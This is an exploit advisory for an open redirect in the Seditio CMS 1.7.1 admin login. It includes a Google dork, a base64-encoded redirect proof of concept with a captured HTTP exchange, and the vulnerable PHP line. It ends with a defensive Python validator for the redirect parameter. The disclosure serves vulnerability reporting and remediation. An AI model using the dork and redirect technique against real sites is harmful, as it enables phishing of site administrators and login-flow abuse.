Seditio CMS 1.7.1 Open Redirect
Posted on 28 July 2015
[+] Exploit Title: Seditio CMS Open Redirect
[+] Google Dork: intext:"Powered by Seditio CMS"
[+] Date: 27/7/2015
[+] Exploit Author: Arash Khazaei
[+] Vendor Homepage: http://www.seditiocms.com/
[+] Software Link: http://www.seditiocms.com/page.php?id=20&a=dl
[+] Version: 1.7.1 (Last Version)
[+] Tested on: Kali, Windows
[+] CVE: N/A
======================================================
[+] Introduction:
[+] An open redirect vulnerability in the admin login page affects the CMS.
[+] It can be used to bypass CSRF protection when changing the admin password, for phishing, and more.
======================================================
[+] PoC:
[+] To exploit this vulnerability we need to Base64-encode our URL.
[+] Our URL: Google = aHR0cDovL2dvb2dsZS5jb20=
=====================
[+] The default redirect page is /admin.php, meaning that after the admin logs in they are redirected to /admin.php.
[+] Default URL: http://localhost/users.php?m=auth&redirect=L2FkbWluLnBocA==
[+] If we replace the encoded URL with our own encoded URL, the admin is redirected to google.com after login.
[+] Our URL: http://localhost/users.php?m=auth&redirect=aHR0cDovL2dvb2dsZS5jb20=
[+] Result:
[+] http://localhost/sido/users.php?m=auth&a=check&redirect=aHR0cDovL2dvb2dsZS5jb20=
[+] POST /sido/users.php?m=auth&a=check&redirect=aHR0cDovL2dvb2dsZS5jb20= HTTP/1.1
[+] Host: localhost
[+] User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
[+] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
[+] Accept-Language: en-US,en;q=0.5
[+] Accept-Encoding: gzip, deflate
[+] Referer: http://localhost/sido/users.php?m=auth&redirect=aHR0cDovL2dvb2dsZS5jb20=
[+] Cookie: SEDITIO=MDpfOjA6XzpzcGVjaWFs; KCFINDER_showname=on; KCFINDER_showsize=on; KCFINDER_showtime=on; KCFINDER_order=type; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=on; timezoneOffset=16200,0; __utma=111872281.449674650.1437406401.1437406401.1437406401.1; __utmz=111872281.1437406401.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=97amucvohmev2ltkkmhi9jl9e3
[+] Connection: keep-alive
[+] Content-Type: application/x-www-form-urlencoded
[+] Content-Length: 64
[+]
[+] rusername=admin&rpassword=admin1&rcookiettl=0&x=97AMUCVOHMEV2LTK
[+]
[+] HTTP/1.1 302 Found
[+] Date: Mon, 27 Jul 2015 17:45:08 GMT
[+] Server: Apache/2.4.10 (Win32) OpenSSL/1.0.1i PHP/5.5.15
[+] X-Powered-By: PHP/5.5.15
[+] Expires: Thu, 19 Nov 1981 08:52:00 GMT
[+] Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
[+] Pragma: no-cache
[+] Location: message.php?msg=104&redirect=aHR0cDovL2dvb2dsZS5jb20=
[+] Content-Encoding: gzip
[+] Vary: Accept-Encoding
[+] Content-Length: 20
[+] Keep-Alive: timeout=5, max=100
[+] Connection: Keep-Alive
[+] Content-Type: text/html
[+]
[+] You can see the HTTP 302 Found, redirecting to Google.
[+] Vulnerable code in /system/core/users/user.auth.php:

    $t->assign(array(
        "USERS_AUTH_TITLE" => $L['aut_logintitle'],
        // Vulnerable -> the base64 redirect value is reused without any check
        "USERS_AUTH_SEND" => "users.php?m=auth&a=check&redirect=".$redirect,

Discovered By: Arash Khazaei
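The check that the concatenated `$redirect` value lacks, as an added example that is not part of the advisory or of Seditio's own code: a Python validator that decodes the base64 `redirect` parameter exactly as the CMS transports it and only accepts a site-relative path, exercised with the page's own two values (`L2FkbWluLnBocA==` for `/admin.php` and `aHR0cDovL2dvb2dsZS5jb20=` for the Google URL). Seditio itself is PHP; the equivalent fix is the same test applied to `$redirect` before it is reused in the link and in the final Location header. The function names and the sample inputs are this example's own.

```python
import base64
import binascii
from typing import Optional
from urllib.parse import urlsplit

# Seditio sends the admin to /admin.php when no redirect is given (from the advisory).
DEFAULT_REDIRECT = "/admin.php"


def encode_redirect_param(path: str) -> str:
    """Build the base64 value the CMS places in the `redirect` query parameter."""
    return base64.b64encode(path.encode("utf-8")).decode("ascii")


def decode_redirect_param(value: str) -> Optional[str]:
    """Decode a `redirect` value; None if it is not valid base64 or not UTF-8 text."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def safe_redirect_target(encoded: Optional[str], default: str = DEFAULT_REDIRECT) -> str:
    """Return the post-login redirect target, or `default` when the value is unsafe.

    Only a site-relative path is accepted: it must begin with exactly one '/',
    carry no scheme or host (so neither 'http://host' nor the '//host' and
    '/\\host' forms browsers treat as a new origin), and contain no control
    characters (a CR/LF in the value could otherwise reach the Location header).
    """
    if not encoded:
        return default
    target = decode_redirect_param(encoded)
    if target is None:
        return default
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in target) or "\\" in target:
        return default
    if not target.startswith("/") or target.startswith("//"):
        return default
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:  # belt and braces: must parse as a bare path
        return default
    return target


if __name__ == "__main__":
    # The default value and the attacker-supplied value shown in the advisory.
    for value in ("L2FkbWluLnBocA==", "aHR0cDovL2dvb2dsZS5jb20="):
        print(value, "->", decode_redirect_param(value), "->", safe_redirect_target(value))
```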